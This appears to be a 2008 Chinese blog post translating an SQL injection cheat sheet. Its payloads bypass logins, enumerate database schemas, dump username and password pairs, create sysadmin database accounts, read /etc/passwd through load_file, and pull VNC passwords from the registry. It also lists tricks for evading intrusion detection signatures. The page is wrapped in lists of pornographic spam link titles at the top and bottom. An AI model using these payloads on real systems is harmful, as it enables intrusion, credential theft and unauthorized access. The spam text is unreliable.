<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      SQL注射技術總結文檔

       寫在前面:

        最近看了不少老外寫的東西,看時間相同的技術當鋪比我們早了好長一段時間,比如ASP的SQL注射國外02年就出現了,PHP的也在04年出現,而我們一直到05年才接觸到,看看比人家晚了多少時間呀!
      為了盡快了解最新的技術動態,我堅持看E文資料,有的很長,有的很短,本人時間有限,不可能一一翻譯過來,只能挑選自己認為比較適合大家看的東西翻譯過來,希望你能從中學到東西。

          PS:本人英語水平有限,很多都是按照我的理解做的模糊翻譯,若有不當,敬請指正,謝謝!

      ====||目錄||=====
      --------------------
      1、簡介
      2、漏洞測試
      3、收集信息
      4、數據類型
      5、抓取密碼
      6、創建數據庫帳號
      7、MYSQL利用
      8、服務名和配置
      9、在注冊表中找VNC密碼
      10、刺穿IDS認證
      11、在MYSQL中使用char()欺騙
      12、用注釋躲避IDS認證
      13、構造無引號的字符串

      ====||文章開始||====

      1、簡介

      當你看到一個服務器只開了80端口,這在一定程度上說明管理員把系統的補丁做的很好,我們所要做最有效的攻擊則也應該轉向WEB攻擊。SQL注射是最常用的攻擊方式。你攻擊WEN系統(ASP,PHP,JSP,CGI等)比去攻擊系統或者其他的系統服務要簡單的多。
      SQL注射是通過頁面中的輸入來欺騙使得其可以運行我們構造的查詢或者別的命令,我們知道在WEB上面有很多供我們輸入參數的地方,比如用戶名、密碼或者E_mail。

      2、漏洞測試

      最開始我們應該從最簡單的來試:

      - Login:' or 1=1--
      - Pass:' or 1=1--
      - http://website/index.asp?id=' or 1=1--

      還有下面這樣的方式:

      - ' having 1=1--
      - ' group by userid having 1=1--
      - ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')--
      - ' union select sum(columnname) from tablename--

      3、收集信息

      - ' or 1 in (select @@version)--
      - ' union all select @@version--

      上面就可以得到系統的版本和補丁信息。

      4、數據類型

      Oracle數據庫>>
      -->SYS.USER_OBJECTS (USEROBJECTS)
      -->SYS.USER_VIEWS
      -->SYS.USER_TABLES
      -->SYS.USER_VIEWS
      -->SYS.USER_TAB_COLUMNS
      -->SYS.USER_CATALOG
      -->SYS.USER_TRIGGERS
      -->SYS.ALL_TABLES
      -->SYS.TAB
      MySQL數據庫
      -->mysql.user
      -->mysql.host
      -->mysql.db

      MS access數據
      -->MsysACEs
      -->MsysObjects
      -->MsysQueries
      -->MsysRelationships

      MS SQL Server數據庫
      -->sysobjects
      -->syscolumns
      -->systypes
      -->sysdatabases

      5、抓取密碼

      用類似下面的語句。。。
      //保存查詢的結果
      step1 : '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
      //取得信息
      step2 : ' and 1 in (select var from temp)--
      //刪除臨時表
      step3 : ' ; drop table temp --

      6、創建數據庫帳號

      MS SQL
      exec sp_addlogin 'name' , 'password'
      exec sp_addsrvrolemember 'name' , 'sysadmin'

      MySQL
      INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))

      Access
      CRATE USER name IDENTIFIED BY 'pass123'

      Postgres (requires Unix account)
      CRATE USER name WITH PASSWORD 'pass123'

      Oracle
      CRATE USER name IDENTIFIED BY pass123
              TEMPORARY TABLESPACE temp
               DEFAULT TABLESPACE users;
      GRANT CONNECT TO name;
      GRANT RESOURCE TO name;

      7、MYSQL交互查詢

      使用Union查詢,暴出文件代碼,如下:
        - ' union select 1,load_file('/etc/passwd'),1,1,1;

      8、系統服務名和配置

      - ' and 1 in (select @@servername)--
      - ' and 1 in (select servername from master.sysservers)--

      9、找到VNC密碼(注冊表)

      實驗語句如下:

      - '; declare @out binary(8)
      - exec master..xp_regread
      - @rootkey = 'HKEY_LOCAL_MACHINE',
      - @key = 'SOFTWARE/ORL/WinVNC3/Default',
      - @value_name='password',
      - @value = @out output
      - select cast (@out as bigint) as x into TEMP--
      - ' and 1 in (select cast(x as varchar) from temp)--

      10、避開IDS檢測

      Evading ' OR 1=1 Signature

      - ' OR 'unusual' = 'unusual'
      - ' OR 'something' = 'some'+'thing'
      - ' OR 'text' = N'text'
      - ' OR 'something' like 'some%'
      - ' OR 2 > 1
      - ' OR 'text' > 't'
      - ' OR 'whatever' in ('whatever')
      - ' OR 2 BETWEEN 1 and 3

      11、MYSQL中使用char()函數

      不帶引號的注射,例如: (string = "%"):
      --> ' or username like char(37);
      帶引號的注射,例如: (string="root"):
      --> ' union select * from users where login = char(114,111,111,116);
      在 unions中使用load files 函數,例如:(string = "/etc/passwd"):
      -->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
      檢查文件是否存在,例如: (string = "n.ext"):
      -->' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

      12、利用注釋符號避開IDS

      舉例如下:

      -->'/**/OR/**/1/**/=/**/1
      -->Username:' or 1/*
      -->Password:*/=1--
      -->UNI/**/ON SEL/**/ECT  (!!!這個比較罕見,應該大有作為!!!)
      -->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
      -->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')

      13、不帶引號的字符串

      用char()或者0X來構造不含引號的語句。。
      --> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)


      ======================================================================

      posted @ 2008-12-18 19:38  .NET快速開發框架  閱讀(360)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 日本欧美一区二区三区在线播放| 午夜福利片1000无码免费| 男女啪啪高潮激烈免费版| 一区二区三区自拍偷拍视频| 奇米四色7777中文字幕| 日韩中文字幕av有码| 亚洲区综合区小说区激情区| 亚洲人成网站18禁止无码| 免费人成在线视频无码| 国产精品理论片在线观看| 久久一日本道色综合久久 | 午夜通通国产精品福利| 国产精品熟妇视频国产偷人| 啦啦啦视频在线日韩精品| 欧美在线观看www| 国产精品午夜福利片国产| 欧美影院成年免费版| 精品国产午夜理论片不卡| 精品人妻一区二区三区蜜臀| 久久久久国产精品熟女影院| 熟女人妇 成熟妇女系列视频| 国产精品呻吟一区二区三区| 欧美高清狂热视频60一70| 久久AV中文综合一区二区| 亚洲国产精品自在拍在线播放蜜臀| 久久久无码精品亚洲日韩蜜桃| 强奷乱码中文字幕| 亚洲av一本二本三本| 成人亚洲一级午夜激情网| 亚洲av一区二区在线看| 日韩不卡在线观看视频不卡| 伊人色综合一区二区三区| 国产线播放免费人成视频播放| 国产精品不卡一二三区| 亚洲天堂av在线免费看| 武胜县| 色秀网在线观看视频免费| 高清无码爆乳潮喷在线观看| 国产日产欧产精品精品| 亚洲综合一区二区三区在线| 免费人成在线观看网站|